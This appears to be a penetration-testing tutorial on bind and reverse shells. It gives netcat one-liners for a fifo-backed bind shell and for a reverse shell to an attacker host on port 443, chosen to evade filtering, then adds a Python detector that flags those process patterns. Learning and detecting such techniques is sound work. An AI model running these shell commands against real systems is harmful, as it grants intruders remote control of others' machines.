
Shells and Payloads

Bind Shells

A bind shell listens on the compromised system for incoming connections.

Challenges with bind shells

  • Firewalls may block incoming connections.
  • NAT can complicate direct connections.
  • The shell must be started on the target system beforehand.
  • May require elevated privileges to bind to certain ports.

Establish a bind shell with netcat

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l -p 4444 > /tmp/f

then connect from your machine:

nc <target_ip> 4444

Reverse Shells

The compromised machine connects back to a listener on the attacker's machine. This has a better chance of success because outbound connections are rarely filtered or blocked, although a firewall with DPI (Deep Packet Inspection) may still be able to detect and block this traffic.

Establish a reverse shell with netcat

On our machine, set up the listener:

/bin/bash$ nc -lp 443 

We use the common HTTPS port (443) to blend in with normal traffic. On the target machine, run:

/bin/bash$ nc -e /bin/sh <attacker_ip> 443
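Both variants leave the same fingerprint on the host: a shell process wired to a network socket. The Python below is an added detection example, not part of the original notes; it scans constructed `ps -eo pid,ppid,user,args` output for the fifo-backed bind shell pipeline and the `nc -e` reverse shell shown above.

```python
import re

# Constructed sample output of `ps -eo pid,ppid,user,args` (not real data).
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
 1203     1 www-data nginx: worker process
 2291  2270 www-data /bin/sh -c rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l -p 4444 > /tmp/f
 2295  2291 www-data nc -l -p 4444
 3102  3090 www-data nc -e /bin/sh 203.0.113.10 443
 4400  4390 alice    ssh -p 443 git@example.net
"""

# Command-line patterns for the two shell shapes described in the notes.
BIND_PATTERNS = [
    (r"mkfifo\s+\S+.*\|\s*/bin/sh\s+-i", "fifo-backed shell pipeline"),
    (r"\bnc\b.*\s-l[a-z]*(?:\s|$)", "netcat listening (bind shell)"),
]
REVERSE_PATTERNS = [
    (r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh\b", "netcat executing a shell (reverse shell)"),
]


def classify_process(args):
    """Return (kind, reason) for one process command line, or None if benign."""
    for pat, reason in BIND_PATTERNS:
        if re.search(pat, args):
            return ("bind", reason)
    for pat, reason in REVERSE_PATTERNS:
        if re.search(pat, args):
            return ("reverse", reason)
    return None


def scan_ps(text):
    """Parse `ps -eo pid,ppid,user,args` output and return suspicious entries."""
    findings = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)      # pid, ppid, user, then the full command
        if len(parts) < 4:
            continue
        pid, _ppid, user, args = parts
        hit = classify_process(args)
        if hit:
            findings.append({"pid": int(pid), "user": user, "kind": hit[0], "reason": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan_ps(SAMPLE_PS):
        print(f"pid={f['pid']} user={f['user']} {f['kind']}: {f['reason']}")
```

Run against the constructed sample, it flags pids 2291 and 2295 as bind-shell components and 3102 as a reverse shell, while the `ssh -p 443` session is left alone.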